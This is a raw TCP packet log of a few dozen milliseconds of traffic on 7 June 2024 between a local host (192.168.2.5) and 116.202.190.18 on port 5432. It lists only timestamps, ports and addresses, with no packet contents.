Jun 7, 2024 17:21:17.482321978 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.482356071 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.482368946 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.482368946 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.482466936 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.482501030 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.482522011 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.482522011 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.482534885 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.482578993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.482578993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.483383894 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.483417988 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.483452082 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.483464956 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.483464956 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.483484983 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.483490944 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.483527899 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.485105991 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.485136032 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.485171080 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.485173941 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.485183954 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.485203028 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.485213995 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.485266924 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.485975027 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.486028910 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.486037016 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.486058950 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.486092091 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.486103058 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.486103058 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.486139059 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.486922979 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.486975908 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.487005949 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.487035990 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.487035990 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.487045050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.487097025 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.487097025 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.487965107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.487994909 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.488024950 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.488029003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.488060951 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.488068104 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.488068104 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.488112926 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.488708019 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.488765955 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.488801003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.488831997 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.488856077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.488863945 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.488898993 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.488913059 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.488913059 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.488948107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.490166903 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.490200996 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.490232944 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.490236044 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.490268946 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.490279913 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.490279913 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.490331888 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.490626097 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.490668058 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.490701914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.490715981 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.490715981 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.490735054 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.490760088 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.490799904 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.491559029 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.491589069 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.491638899 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.491638899 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.491641998 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.491677046 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.491698027 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.491710901 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.491764069 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.491764069 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.492597103 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.492626905 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.492660046 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.492680073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.492680073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.492695093 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.492728949 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.492732048 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.492743015 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.492846012 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.493649960 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.493680000 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.493710041 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.493731976 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.493760109 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.493766069 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.493799925 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.493812084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.493812084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.493835926 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.495357037 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.495409966 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.495414019 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.495443106 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.495477915 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.495488882 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.495488882 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.495507956 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.495543957 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.495629072 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.496032000 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.496062040 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.496094942 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.496100903 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.496100903 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.496128082 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.496156931 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.496257067 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.497522116 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.497550964 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.497581005 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.497663975 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.497684002 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.497693062 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.497739077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.497739077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.497745037 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.497772932 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.497807980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.497819901 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.497819901 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.497880936 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.497895956 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.497980118 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.497999907 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.498106956 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.498485088 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.498512983 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.498564959 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.498564959 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.499562979 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.499592066 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.499619961 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.499640942 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.499677896 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.499691963 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.499715090 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.499722958 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.499722958 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.499844074 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.501991034 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.502043009 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.502075911 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.502110958 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.502118111 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.502177000 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.502212048 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.502264023 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.502265930 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.502299070 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.502324104 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.502331018 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.502366066 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.502377987 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.502377987 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.502420902 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.502674103 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.502703905 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.502737045 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.502751112 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.502751112 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.502770901 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.502811909 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.502891064 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.503597975 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.503652096 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.503657103 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.503683090 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.503710985 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.503715992 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.503756046 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.503756046 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.504403114 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.504431963 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.504466057 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.504484892 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.504486084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.504525900 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.504554033 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.504587889 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.504607916 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.504646063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.505767107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.505795956 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.505835056 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.505846024 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.505850077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.505880117 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.505913973 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.505928993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.505928993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.505997896 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.506026983 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.506040096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.506059885 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.506078959 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.506114006 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.506129980 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.506129980 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.506146908 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.506201029 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.506201029 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.506947041 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.507013083 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.507029057 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.507067919 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.507097006 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.507110119 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.507138968 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.507138968 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.508407116 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.508527040 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.508527994 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.508558035 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.508591890 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.508606911 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.508606911 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.508625984 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.508673906 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.508673906 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.510263920 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.510292053 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.510318041 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.510343075 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.510377884 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.510382891 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.510394096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.510413885 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.510453939 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.510478020 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.511105061 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.511133909 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.511164904 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.511188030 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.511198997 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.511233091 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.511255026 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.511266947 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.511313915 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.511313915 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.511725903 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.511779070 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.511781931 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.511812925 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.511835098 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.511846066 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.511893988 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.511893988 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.512547016 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.512576103 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.512609005 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.512617111 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.512636900 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.512641907 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.512684107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.512684107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.514051914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.514081001 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.514111996 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.514131069 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.514210939 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.514264107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.514297962 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.514312029 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.514312029 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.514332056 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.514364004 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.514379978 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.514379978 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.514404058 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.514437914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.514441013 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.514472961 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.514482975 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.514482975 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.514508963 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.514560938 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.514560938 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.514832020 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.514883041 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.514934063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.514934063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.514995098 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.515028954 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.515070915 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.515077114 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.515077114 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.515155077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.516711950 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.516746044 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.516779900 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.516786098 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.516786098 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.516844034 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.517664909 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.517693996 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.517721891 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.517728090 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.517762899 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.517776966 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.517776966 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.517796040 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.517842054 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.517842054 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.518558979 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.518588066 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.518620968 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.518644094 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.518644094 CEST	49716	5432	192.168.2.5	116.202.190.18
